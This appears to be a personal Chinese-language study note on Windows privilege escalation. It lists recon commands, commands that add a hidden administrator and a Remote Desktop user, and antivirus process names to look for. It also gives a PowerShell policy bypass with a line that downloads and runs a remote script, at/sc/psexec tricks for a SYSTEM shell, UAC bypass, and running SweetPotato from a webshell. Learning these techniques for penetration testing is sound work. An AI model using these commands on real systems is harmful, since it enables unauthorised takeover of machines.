Windows提权

下边内容都是一些提权思路的整理，对于很多知识点并没有细化和深入，仅供个人参考，日后在实战中碰到了会深入学习并记录在新的文章中。

基础知识

权限组划分：

• Administrators：管理员组，默认情况下，Administrators中的用户对计算机/域有不受限制的完全访问权。
• Power Users：高级用户组,Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。
• Users：普通用户组,这个组的用户无法进行有意或无意的改动。
• Guests：来宾组,来宾跟普通Users的成员有同等访问权，但来宾帐户的限制更多
• Everyone：所有的用户，这个计算机上的所有用户都属于这个组。

信息搜集：

一些基础命令

$ query user               # 查看用户登陆情况
$ whoami                   # 当前用户权限
$ set                      # 环境变量
$ hostname                 # 主机名
$ systeminfo               # 查看当前系统版本与补丁信息
$ ver                      # 查看当前服务器操作系统版本
$ net user                 # 查看用户信息
$ net start                # 查看当前计算机开启服务名称
$ netstat -ano             # 查看端口情况
$ netstat -ano|find "3389" # 查看指定端口
$ tasklist                 # 查看所有进程占用的端口
$ taskkil /im xxx.exe /f   # 强制结束指定进程
$ taskkil -PID pid号       # 结束某个pid号的进程
$ tasklist /svc|find "TermService" # 查看服务pid号
$ wmic os get caption              # 查看系统名
$ wmic product get name,version    # 查看当前安装程序
$ wmic qfe get Description,HotFixID,InstalledOn # 查看补丁信息
$ wmic qfe get Description,HotFixID,InstalledOn | findstr /C:"KB4346084" /C:"KB4509094" # 定位特定补丁

# 添加管理员用户
$ net user username(用户名) password(密码) /add  # 添加普通用户
$ net localgroup adminstrators username /add   # 把普通用户添加到管理员用户组
# 如果远程桌面连接不上可以添加远程桌面组
$ net localgroup "Remote Desktop Users" username /add

常见的杀软进程：

360sd.exe 360杀毒
360tray.exe 360实时保护
ZhuDongFangYu.exe 360主动防御
KSafeTray.exe 金山卫士
SafeDogUpdateCenter.exe 安全狗
McAfee McShield.exe McAfee
egui.exe NOD32
AVP.exe 卡巴斯基
avguard.exe 小红伞
bdagent.exe BitDefender

补丁信息搜集提权

• Sherlock：https://github.com/rasta-mouse/Sherlock

分析漏洞并给出对应利用的Exp工具

# 启动Powershell
$ powershell.exe -exec bypass

# 本地加载脚本
$ Import-Module Sherlock.ps1

# 远程加载脚本
$ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

# 检查漏洞，Vulnstatus为Appears Vulnerable即存在漏洞
$ Find-AllVulns

• Windows-Exploit-Suggeste：https://github.com/AonCyberLabs/Windows-Exploit-Suggester
• 根据补丁信息查找漏洞编号：https://i.hacking8.com/tiquan/
• Windows平台提权漏洞集合：https://github.com/SecWiki/windows-kernel-exploits

at、sc命令提权

在Windows2000、2003、XP系统中，使用at命令创建的计划任务将以system权限运行

# 设置交互式cmd定时计划任务
$ at mm:ss /interactive cmd

在Windows 8、2016之前系统中，使用sc命令创建并启动的服务将以system权限运行

# 创建开启交互式cmd的服务，服务名位systemcmd
$ sc Create systemcmd binPath= "cmd /K start" type= own type= interact
# 开启名为systemcmd的服务
$ sc start systemcmd

psexec提权

PsExec 是一种轻型telnet 替换，可用于在其他系统上执行进程，为控制台应用程序完成完全交互，而无需手动安装客户端软件。

适用版本：Windows 2003、2008

psexec.exe -accepteula -s -i -d cmd.exe

绕过UAC提权

用户帐户控制（User Account Control，简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权，以达到帮助阻止恶意程序（有时也称为“恶意软件”）损坏系统的效果。

使用msf或者cs时，它们都附带了一些绕过UAC的攻击，使用getsystem自动提权

烂土豆提权

烂土豆提权需要用户为web或数据库权限用户。

实测Win7、Win8、08、12等可用

项目地址（网上关于烂土豆的项目有很多）：https://github.com/uknowsec/SweetPotato

直接在Webshell下执行

SweetPotato.exe -a whoami